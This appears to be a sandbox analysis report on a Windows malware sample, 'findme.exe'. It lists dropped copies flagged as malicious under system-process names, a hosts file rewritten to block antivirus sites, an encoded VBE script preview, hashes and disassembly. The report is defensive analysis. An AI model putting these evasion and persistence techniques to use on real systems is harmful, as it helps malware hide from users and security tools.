                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                  C:\Users\jones\AppData\Local\24dbde2999530e

                  Download File
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:ASCII text, with very long lines (453), with no line terminators
                  Category:dropped
                  Size (bytes):453
                  Entropy (8bit):5.8670097180463365
                  Encrypted:false
                  SSDEEP:12:uXodcmOCyXbWOHlvZE9u42/KLNhdur4NSR7:QuHOCyXbTHfE94/K5IGSd
                  MD5:68B8A3CA6BBF17FDA7FE3F51C80E1F86
                  SHA1:6790E70712C9316DA9935958DB682E6C885D28B0
                  SHA-256:636206D5E3AEAE24E98D660E58CA867DF10F57C3FE6367AFFEEA028711ACA659
                  SHA-512:C44E4095CB8E6A57D54F268877C1DB23D41D33525C1CC73755287C0A99FAECD73EDF7D3108DEEF0261685015181263F67AEB234C83114F126730082529565D94
                  Malicious:false
                  Preview:aIBJpDEEQOtNKt2dvKeIlpewC0UFT6Ru871edF7ZdstDDvdtjTomlG0voPHyt8uU69ON2YAqNFo35atRXlgARoJ2HF0N8Ipf7ZHDgQ0LS8Zgb6zNgzbIctDS0WFwhwrFZJ5gTpvHuUrSPnaKPmrJqhCNVyNJKEngRUGSBT40EUYHBuDM55g5EiY2GrKecl7prLB4gII6s1EWI4LlvAOPisbs5OLTIZYcXsa0sIqwwjNNdBtMfjtbXrH9tT9R7yxSdl9aeV2mUbc8fOO4f9yjq6FplbGZJYz7v4t1BTrKrGH6PJdfEEv8AOmggUyCOdd5lfMkfX2MRo2kzJZc7lVEm06hSNVreo5NmLUu63ArMjrWWBqW4WFnIYSvipSRBLsmso7ozpfEln2DJkKQg8wHjRFO3jLRlspA1EnsEChP1BCefPl8eBvDYkDbisvQeNd382LF6

                  C:\Users\jones\AppData\Local\WmiPrvSE.exe

                  Download File
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3086848
                  Entropy (8bit):7.7307619251577515
                  Encrypted:false
                  SSDEEP:49152:Je1fNayqo7lKdSD6qVvWakQ4BnFxFkUP6IqG7bZ0Z2lOWvOhvECUQ:GNuAD3vyQ9bLG7yglVv4vHU
                  MD5:EEC01D18C981A5973DA10C8CBAC73764
                  SHA1:A366E8AFF64B3B84C129A54615700B9A6A3238C1
                  SHA-256:4C8610C40E37FB70DA6B33AD42C7F5D8A0CC34A16C34A3837AF521EFBF79FA2F
                  SHA-512:6425DD22C982BE9BC1B10A5B885CA1E610B6EE30F2C3A5181F5D6BCDB5A84BDF6B4A5A851C9552F9B7B1F29D5141ECD2FFB0D00D41F3B70C64F7F332A877F165
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 88%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ..../...@.. ......................../...........@.................................p...K....@/......................`/...................................................... ............... ..H............text........ ...................... ..`.sdata.../..../..0..................@....rsrc........@/......./.............@..@.reloc.......`/......./.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Windows\AppReadiness\66583f2b23107c

                  Download File
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:ASCII text, with very long lines (571), with no line terminators
                  Category:dropped
                  Size (bytes):571
                  Entropy (8bit):5.8828879419951035
                  Encrypted:false
                  SSDEEP:12:kxaowqajGORvs/sdqnaYtFXGil+WPpsWala4/0DvJDyqZqVEruJUZ9x:83aG/sdvYtt2OsWW30DhuaqV0Z9x
                  MD5:B64095CE5826AB4BE827A723E273BF19
                  SHA1:CB6D7FAF7AFD6B3DFB973367ADAAD7616A6A84E7
                  SHA-256:28B05000D12545C7466421D65C7FE634D700823EBFDA87080686DF3DF29AD3DE
                  SHA-512:36DE32C495967B2140CD7CDF546233CD25C7A8CD92312B388BBCFD314EC53DA3F399089A382A7A65476A070784AB1E611CF0577C1F9F57618F0F31A691643C41
                  Malicious:false
                  Preview:HAXVNDswzV2rtQ7hwvKGFP5O8yVpxBFsWHY1E1ZXuyrgSoHLYDNr2Vd2EJWYrC8yQKVl2Fd4VwVQhY5TrKQuxXzBofx4fBpr03QITgSSjSWF9MVpOCrhvNA2UT7WSjZTGoaoIxAL18KeAtCbKHqcUI6m2Yx9i6AA3C9UwrhaCfqxDf2kRfML2798rxvt9Am58Jl7urpdkPaybIjWgNsDtyI6DBn85xaB3vz344zkztknhKgiNZNwSjLJBo4tEqiwyY5qTqblXINAOeZ2eEvfjosUjq1P9GfJKyzIP0Pg7lZKVL4hPCP95CMKpkGnzMmQmEzZpRmnzOh7Ph8YvUA70gNIlocpulrv9IiRVf18ZlKrfO5Ilr1fLoZF0ryAy63Ngv8G9rCQcChPVgnWtUDCuMkUscaor1Jcr6KtQyJ4plCJHKtUEbQe31dTLnYgQYjl2EhYV3G5LIXIKaNitGkPkpj0d1hnanoQCbRCmU9KUVTueUJvZ0wJxTBMfr5eWdfheGFtIL5YHa4PWyWIrwNk0ectaEh5Zey10vPXPamO4YCXYv0qVwwkP4rAnWT

                  C:\Windows\AppReadiness\WGNWJePMcpkvwPkbkGq.exe

                  Download File
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3086848
                  Entropy (8bit):7.7307619251577515
                  Encrypted:false
                  SSDEEP:49152:Je1fNayqo7lKdSD6qVvWakQ4BnFxFkUP6IqG7bZ0Z2lOWvOhvECUQ:GNuAD3vyQ9bLG7yglVv4vHU
                  MD5:EEC01D18C981A5973DA10C8CBAC73764
                  SHA1:A366E8AFF64B3B84C129A54615700B9A6A3238C1
                  SHA-256:4C8610C40E37FB70DA6B33AD42C7F5D8A0CC34A16C34A3837AF521EFBF79FA2F
                  SHA-512:6425DD22C982BE9BC1B10A5B885CA1E610B6EE30F2C3A5181F5D6BCDB5A84BDF6B4A5A851C9552F9B7B1F29D5141ECD2FFB0D00D41F3B70C64F7F332A877F165
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 88%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ..../...@.. ......................../...........@.................................p...K....@/......................`/...................................................... ............... ..H............text........ ...................... ..`.sdata.../..../..0..................@....rsrc........@/......./.............@..@.reloc.......`/......./.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Windows\Media\Festival\66583f2b23107c

                  Download File
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:ASCII text, with very long lines (343), with no line terminators
                  Category:dropped
                  Size (bytes):343
                  Entropy (8bit):5.8397578781750665
                  Encrypted:false
                  SSDEEP:6:h+RdcMcjyXRSS1PNIod4Wjf5SkUhANct2INUgGhD9B/iYKFoPGU2G6H:cbcyBhn5mqBWhXUbB/iYSouU2G6H
                  MD5:B40B317575C6D470651713489D9AFCEB
                  SHA1:D3C724ABAACAE3E330B660195792A82DBC7E715D
                  SHA-256:C8E97D3872D3DAA70775733B7A93BF642F0D32B60DFC3930755221F2FD7C6B1F
                  SHA-512:F5E55D6CB5CFE5DCA6161D6414CCA424BB9405327425DB6776E16118BBF54E6DBE1F97D0D93245F4952E8A0B4DFDDEA35D55323DECD6802EC0EEED47859C81D2
                  Malicious:false
                  Preview:oN1knsNm5DPu2Hhl5ZZvVWQGX3faQPPiiBo0wZV4YaegTNAKlYuCBT9R7uNuMxWqyqM1cryfEfX42twJ2Vy1eNgOBX3BMlrkExsnBIr4jO7g6EZO7D118eLkJ7zFyxTcxw0EAJHtn3SPPAS77oEIu0ljmIeETmGv5fsJNUNy6HOEM5UIo2HJtLs7KRb2pDaAxgUuRJtnaPMmmhXrxVZaf7Cuxv863VI3rNRpkk0fIesd9FVn4uETn9ezdk6gKxtFGT5YPrGNe4SBPjvsaVBIRzPrsbLAnUVVumWpK6YMn1ztrdk4zOGzvlyRDNqxfGjKi6RmMFid6zfa9fAP1QLZNfk

                  C:\Windows\Media\Festival\WGNWJePMcpkvwPkbkGq.exe

                  Download File
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3086848
                  Entropy (8bit):7.7307619251577515
                  Encrypted:false
                  SSDEEP:49152:Je1fNayqo7lKdSD6qVvWakQ4BnFxFkUP6IqG7bZ0Z2lOWvOhvECUQ:GNuAD3vyQ9bLG7yglVv4vHU
                  MD5:EEC01D18C981A5973DA10C8CBAC73764
                  SHA1:A366E8AFF64B3B84C129A54615700B9A6A3238C1
                  SHA-256:4C8610C40E37FB70DA6B33AD42C7F5D8A0CC34A16C34A3837AF521EFBF79FA2F
                  SHA-512:6425DD22C982BE9BC1B10A5B885CA1E610B6EE30F2C3A5181F5D6BCDB5A84BDF6B4A5A851C9552F9B7B1F29D5141ECD2FFB0D00D41F3B70C64F7F332A877F165
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 88%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ..../...@.. ......................../...........@.................................p...K....@/......................`/...................................................... ............... ..H............text........ ...................... ..`.sdata.../..../..0..................@....rsrc........@/......./.............@..@.reloc.......`/......./.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Windows\Provisioning\Packages\66583f2b23107c

                  Download File
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:ASCII text, with very long lines (539), with no line terminators
                  Category:dropped
                  Size (bytes):539
                  Entropy (8bit):5.8625380102648466
                  Encrypted:false
                  SSDEEP:12:ugtr2l5C5YtgXWvodreoHid4heQuJI9gJ/BpGSRW8MCL83+wl9:Hhmv6Id4sTqMKSM8+3+wl9
                  MD5:6FCEE79D5D7D26256877F2893D73977D
                  SHA1:19F9EBE741C7FAB62D6C1736445558B5A8E93BD4
                  SHA-256:C24EEAFAC5287D459FA537B5F7763D4B83D84719CD8323D949382590B49FCDE7
                  SHA-512:9715C64C2059AEC5FABA28B7117E2FB124989FB0E54AFE0BB79DC1ADE38E1834A158285D7332B976C2C1B126FDADBA8F3E4E3F921908E3C601FCFAE6A765C08D
                  Malicious:false
                  Preview:RoKuL8stqm26GXRiNa6O5K6DWIxHdlNWH7IUUPD3ibtlmoCbxEtzocmHsHYDKlQEYgyIO7N7XDqdbVarFWUZ2XspVBmN19s7KoMGz4M00wckwIqWqq8yQ1MAyJwNU9FXUsSwJU2KKeiG5H2NVPhKB4qTcLRqI8f0qFPDz3NVyxowTFFrQi2Ec5VaC9U7CLCL8raz1yXbBLWNQ4AWFkZjGaXvtzB0jQSmvcxlpPzbLaDRiIKI981cwcEiUpGCxh2v2tbxGZq0v7YqXFMlo31lY0zTXPQAJwonhRZyqWBkRBryDYKOceX4qRXB3IZ0Iqr8TuIGqX5R1RTWJBP9FChoZu7P3X4h6LblUsfTPEhFjFCZ7A223avGICjjx2MTcXVpzsCaf6tBecFTriR3fCogaVcRJ6gX1OnLuXjP7bX6rtlq7P2OkTxatzPdPvQjaWJPy3iT9C5EoryquwT3DRwibMc5IFAMKxgVkV1EriPiYtvBAitcbXfIjlymamL3Cs30LdGY5PMfCNJrbb5jVhuxSYv8gPn

                  C:\Windows\Provisioning\Packages\WGNWJePMcpkvwPkbkGq.exe

                  Download File
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3086848
                  Entropy (8bit):7.7307619251577515
                  Encrypted:false
                  SSDEEP:49152:Je1fNayqo7lKdSD6qVvWakQ4BnFxFkUP6IqG7bZ0Z2lOWvOhvECUQ:GNuAD3vyQ9bLG7yglVv4vHU
                  MD5:EEC01D18C981A5973DA10C8CBAC73764
                  SHA1:A366E8AFF64B3B84C129A54615700B9A6A3238C1
                  SHA-256:4C8610C40E37FB70DA6B33AD42C7F5D8A0CC34A16C34A3837AF521EFBF79FA2F
                  SHA-512:6425DD22C982BE9BC1B10A5B885CA1E610B6EE30F2C3A5181F5D6BCDB5A84BDF6B4A5A851C9552F9B7B1F29D5141ECD2FFB0D00D41F3B70C64F7F332A877F165
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 88%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ..../...@.. ......................../...........@.................................p...K....@/......................`/...................................................... ............... ..H............text........ ...................... ..`.sdata.../..../..0..................@....rsrc........@/......./.............@..@.reloc.......`/......./.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Windows\System32\drivers\etc\hosts

                  Download File
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:ASCII text, with CRLF, LF line terminators
                  Category:dropped
                  Size (bytes):1031
                  Entropy (8bit):4.80866969175849
                  Encrypted:false
                  SSDEEP:24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTtzpAvI:vDZhyoZWM9rU5fFcWpAvI
                  MD5:58F68BAB7FA47A2BFEBBCA07EA770F1A
                  SHA1:ACAE041F20A9D69A61B18B986AE599447F4A50BC
                  SHA-256:AFF68CCE8D6BB4C29C13D36453BF833175A2819CF2B6B3A55B0247700A1DF2F2
                  SHA-512:21DD3869BA16B04B6A216EA45F27C02326D84288FCF94730FAA64B8E2D23F8A76526059790AEFED294DD4375DC662272137BCA06030A8042EB76981FF7D8EBE9
                  Malicious:true
                  Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....127.0.0.1 www.virustotal.com.127.0.0.1 www.360totalsecurity.com.127.0.0.1 virustotal.com.127.0.0.1 360totalsecurity.com.127.0.0.1 www.avast.ru.127.0.0.1 avast.ru.127.0.0.1 ww

                  C:\Windows\Tasks\66583f2b23107c

                  Download File
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:ASCII text, with very long lines (664), with no line terminators
                  Category:dropped
                  Size (bytes):664
                  Entropy (8bit):5.892458135893502
                  Encrypted:false
                  SSDEEP:12:ljbCz2M7X4w+jl/J82TfugDLWR3dd3YsUQNvwFY/LfZ30JJjUQNhjSWFeITwL:G4TJrigWHrNvwS/LZPWFeCwL
                  MD5:468BBDBFAA21C1D3E568D42F7BF613C4
                  SHA1:F47A030EDACB5E1141A3E567E7B43254346EB9B0
                  SHA-256:B293A4ACD674EC935C598D3C0E648701A12F37B410E51105505695EB9A4650CD
                  SHA-512:89F5B043B9388DE4CE81E60D65AD793DBAE27F3CA3CE1307DA59007F59E1F11482E88845478C1BA915A2A8CBDFDAE14B88098C14D0FB1BF2C4DDD6B4E7ED0C60
                  Malicious:false
                  Preview:VzXnaDOvbhT77hrrexet2OwQqoMRAnVT8HRQ9Kc6UVVovtsHv7ewZfwGDH7w07vyM990QbrUViZh3He75FfCIi3cUKN2NpFXjgcvu21UPKb0GPN5mA0vbspnFhfFNzGpdB7WotMDNLw8HDVF6RPNzT511zpMWvGaDvXER0Q3xwiP5rfCLZJ6j20JFGfzDArbEW4WpQyGBWaCvq5JTnA6mK1K5N8LUbzxFGKjwJW5lC4McxXZKWfa9uz4etbcRmwkgn6pfWXKQFVkPosHzjB85ZyVQQECs4n8PUpy1s4x9VJ3ZOozBTmslyoHzlYORUbWbWU483QHoN8kQ45BlOBYS5Xbqi9PTpfo3wbD4u1HDeDXzE04pWnCSCEg82Oa4Ax9rUqdc2H0X3Vx19mmsEj7BdW0s5EBgaNCrEpfXXbxPwpYrQp9Qlszb07O8zuhyFU7qTGxTGOUmwrPy7JbPEu4sYl0Gbhhm48JbrsYK2pJXXNoIsaAqSStVaOSrPq2jqssxixGOvRXZkgVL6rYAg1TmPyBdaq5Lwkroe0k5Uw5B4Uu33HvhS1DyYGiuvmxEWLmAzqqFHdqt5Sr5EIkT5X35g2PYS0Jr91psrtDMapZyLT2GYnpmCdJ8Srd6aSxRT8uEm9NUEX3Q7EtM9I9pKgofrqa

                  C:\Windows\Tasks\WGNWJePMcpkvwPkbkGq.exe

                  Download File
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3086848
                  Entropy (8bit):7.7307619251577515
                  Encrypted:false
                  SSDEEP:49152:Je1fNayqo7lKdSD6qVvWakQ4BnFxFkUP6IqG7bZ0Z2lOWvOhvECUQ:GNuAD3vyQ9bLG7yglVv4vHU
                  MD5:EEC01D18C981A5973DA10C8CBAC73764
                  SHA1:A366E8AFF64B3B84C129A54615700B9A6A3238C1
                  SHA-256:4C8610C40E37FB70DA6B33AD42C7F5D8A0CC34A16C34A3837AF521EFBF79FA2F
                  SHA-512:6425DD22C982BE9BC1B10A5B885CA1E610B6EE30F2C3A5181F5D6BCDB5A84BDF6B4A5A851C9552F9B7B1F29D5141ECD2FFB0D00D41F3B70C64F7F332A877F165
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 88%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ..../...@.. ......................../...........@.................................p...K....@/......................`/...................................................... ............... ..H............text........ ...................... ..`.sdata.../..../..0..................@....rsrc........@/......./.............@..@.reloc.......`/......./.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\runtimebrokerHost\6203df4a6bafc7

                  Download File
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):259
                  Entropy (8bit):5.8309821490188805
                  Encrypted:false
                  SSDEEP:6:BUVkuWp9nn4V4MH/M59d4ig1KVQ0QD/xs:GVTk9nn4V7a9dbjQjK
                  MD5:3472582D086618A9732F0349B7DEF6C5
                  SHA1:4814B4E3C8ABCEA31CEE4F929D924EECEF804F63
                  SHA-256:2779FB64107A0699301772365C61BE694C8B8E6372D23D649B7AD47BC62A1417
                  SHA-512:415ECCD34CB291CD63F78932C3E8C225C9528405932D9A8DC0E4014D4D010AF552730826B991557C8FE156BFE499775A2CF3CA6EF1C4CE3585D3F85E7DAABF0D
                  Malicious:false
                  Preview:lsn7Nxj6mlQBMKVRRuoiJfnDgBC0Rm1UfL6AHSQa36WQ5DtSzMJwmAGFEkbLvtp9u6gBNVK9eNoMJXIcStAFcFseE05g1FoKRWg8hsEeBKSYV36rc83BsjhpOB6WZnHYjd5x0J5jofDSwUJK4OE2Lnbry1ugvsFXC3y28I0SDTWNfO232vcKjPN6BO89ZZy6aqP3fRMvYvz2QOLk80nAP4yxq20uK03ofZwz99XliqwxZVpxCYAivxqg1cMmackh2LW

                  C:\runtimebrokerHost\Gjynmp1cQgbqqAJzLCDkc0fMhQUnd.bat

                  Download File
                  Process:C:\Users\user\Desktop\findme.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):37
                  Entropy (8bit):4.2629790410707376
                  Encrypted:false
                  SSDEEP:3:I5ALsHXqX4+oINH:Ie43qo+o6
                  MD5:2F75CB9C29AD8DC8DAB47B39673A8F09
                  SHA1:89B9602BCF66BEA31F020C426878ACC7AA922B44
                  SHA-256:A42BDF46C460B2E7BAA4EC022DBA0474A9A9A9EEF343AE824A533E1FF700417E
                  SHA-512:54E8C98FAFBEEB42AF261747AFCF763E17113EF5EE4E23501F6088DA93FD004C9DB28C1D41C7C9A3FE05211ABF9CD40ADA3DB993CBDD545CB88C32C77EB07812
                  Malicious:false
                  Preview:"C:\runtimebrokerHost\webnetdhcp.exe"

                  C:\runtimebrokerHost\P6MatiaJbshfFUR3.vbe

                  Download File
                  Process:C:\Users\user\Desktop\findme.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):223
                  Entropy (8bit):5.87738728811133
                  Encrypted:false
                  SSDEEP:6:GXkgwqK+NkLzWbHY08nZNDd3RL1wQJR8vz1TGR7bbnJJNA:GXkBMCzWLY04d3XBJ2vJKRvDJA
                  MD5:E63C96D58301C1F1E3DAE1378B1B0ECA
                  SHA1:186598FA4A820157A4C284450F13C567BB3CB90E
                  SHA-256:EE8722B767B0C57B52C64CDB9F7B4ECA2B3593FBCDE9C6106391A6B065195B2A
                  SHA-512:390D7A2404C0379FF64C26BC6E046E09D6AB420AADE79D7A1E8E2AADA032C81621F4AAA5FAAA1D3C4049799E3FCA91F08198E306D2B2E0A2A0947A50E7D345C8
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  Preview:#@~^xgAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJD;.Yb:+(DKV+MCG/Dz!%Hx:aqm5o4$5)9.S;fVmTWtt}j.[R(lOEBP!S~6ls/.LkAAAA==^#~@.

                  C:\runtimebrokerHost\lsass.exe

                  Download File
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3086848
                  Entropy (8bit):7.7307619251577515
                  Encrypted:false
                  SSDEEP:49152:Je1fNayqo7lKdSD6qVvWakQ4BnFxFkUP6IqG7bZ0Z2lOWvOhvECUQ:GNuAD3vyQ9bLG7yglVv4vHU
                  MD5:EEC01D18C981A5973DA10C8CBAC73764
                  SHA1:A366E8AFF64B3B84C129A54615700B9A6A3238C1
                  SHA-256:4C8610C40E37FB70DA6B33AD42C7F5D8A0CC34A16C34A3837AF521EFBF79FA2F
                  SHA-512:6425DD22C982BE9BC1B10A5B885CA1E610B6EE30F2C3A5181F5D6BCDB5A84BDF6B4A5A851C9552F9B7B1F29D5141ECD2FFB0D00D41F3B70C64F7F332A877F165
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 88%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ..../...@.. ......................../...........@.................................p...K....@/......................`/...................................................... ............... ..H............text........ ...................... ..`.sdata.../..../..0..................@....rsrc........@/......./.............@..@.reloc.......`/......./.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\runtimebrokerHost\webnetdhcp.exe

                  Download File
                  Process:C:\Users\user\Desktop\findme.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3086848
                  Entropy (8bit):7.7307619251577515
                  Encrypted:false
                  SSDEEP:49152:Je1fNayqo7lKdSD6qVvWakQ4BnFxFkUP6IqG7bZ0Z2lOWvOhvECUQ:GNuAD3vyQ9bLG7yglVv4vHU
                  MD5:EEC01D18C981A5973DA10C8CBAC73764
                  SHA1:A366E8AFF64B3B84C129A54615700B9A6A3238C1
                  SHA-256:4C8610C40E37FB70DA6B33AD42C7F5D8A0CC34A16C34A3837AF521EFBF79FA2F
                  SHA-512:6425DD22C982BE9BC1B10A5B885CA1E610B6EE30F2C3A5181F5D6BCDB5A84BDF6B4A5A851C9552F9B7B1F29D5141ECD2FFB0D00D41F3B70C64F7F332A877F165
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 88%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ..../...@.. ......................../...........@.................................p...K....@/......................`/...................................................... ............... ..H............text........ ...................... ..`.sdata.../..../..0..................@....rsrc........@/......./.............@..@.reloc.......`/......./.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.677048354051325
                  TrID:
                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                  • Win32 Executable (generic) a (10002005/4) 49.97%
                  • Generic Win/DOS Executable (2004/3) 0.01%
                  • DOS Executable Generic (2002/1) 0.01%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:findme.exe
                  File size:3'403'917 bytes
                  MD5:4fabffd3dfad2d1e11ae2317b40b6e4a
                  SHA1:df2ce294dc75060632bfb45add20e69ccc9396c1
                  SHA256:079172ddcc7b1086b9bf972b21d0d579dbff695fde14811165a986efe322873a
                  SHA512:bc6ab0e0286913472d6ca8cd19e95b4066d433fbb6247ed377e6ade995a74c201902c32463361e9d9746277fe8898d95b8a08114eedc027f062b38d4ea9550ed
                  SSDEEP:49152:ubA3jIe1fNayqo7lKdSD6qVvWakQ4BnFxFkUP6IqG7bZ0Z2lOWvOhvECUQb:ubQNuAD3vyQ9bLG7yglVv4vHUy
                  TLSH:43F5E0117E40CA11F0191633C2EF468557B0ED20AAA6E71B7EB93B6E19123D37C1DADB
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..

                  File Icon

                  Icon Hash:1515d4d4442f2d2d

                  Static PE Info

                  General

                  Entrypoint:0x41ec40
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                  Time Stamp:0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:fcf1390e9ce472c7270447fc5c61a0c1

                  Entrypoint Preview

                  Instruction
                  call 00007FBA60B5A2D9h
                  jmp 00007FBA60B59CEDh
                  cmp ecx, dword ptr [0043E668h]
                  jne 00007FBA60B59E65h
                  ret
                  jmp 00007FBA60B5A45Eh
                  int3
                  int3
                  int3
                  int3
                  int3
                  push ebp
                  mov ebp, esp
                  push esi
                  push dword ptr [ebp+08h]
                  mov esi, ecx
                  call 00007FBA60B4CBF7h
                  mov dword ptr [esi], 00435580h
                  mov eax, esi
                  pop esi
                  pop ebp
                  retn 0004h
                  and dword ptr [ecx+04h], 00000000h
                  mov eax, ecx
                  and dword ptr [ecx+08h], 00000000h
                  mov dword ptr [ecx+04h], 00435588h
                  mov dword ptr [ecx], 00435580h
                  ret
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  lea eax, dword ptr [ecx+04h]
                  mov dword ptr [ecx], 00435568h
                  push eax
                  call 00007FBA60B5CFFDh
                  pop ecx
                  ret
                  push ebp
                  mov ebp, esp
                  sub esp, 0Ch
                  lea ecx, dword ptr [ebp-0Ch]
                  call 00007FBA60B4CB8Eh
                  push 0043B704h
                  lea eax, dword ptr [ebp-0Ch]
                  push eax
                  call 00007FBA60B5C712h
                  int3
                  push ebp
                  mov ebp, esp
                  sub esp, 0Ch
                  lea ecx, dword ptr [ebp-0Ch]
                  call 00007FBA60B59E04h
                  push 0043B91Ch
                  lea eax, dword ptr [ebp-0Ch]
                  push eax
                  call 00007FBA60B5C6F5h
                  int3
                  jmp 00007FBA60B5E743h
                  jmp dword ptr [00433260h]
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  push 00421EB0h
                  push dword ptr fs:[00000000h]

                  Rich Headers

                  Programming Language:
                  • [ C ] VS2008 SP1 build 30729
                  • [IMP] VS2008 SP1 build 30729
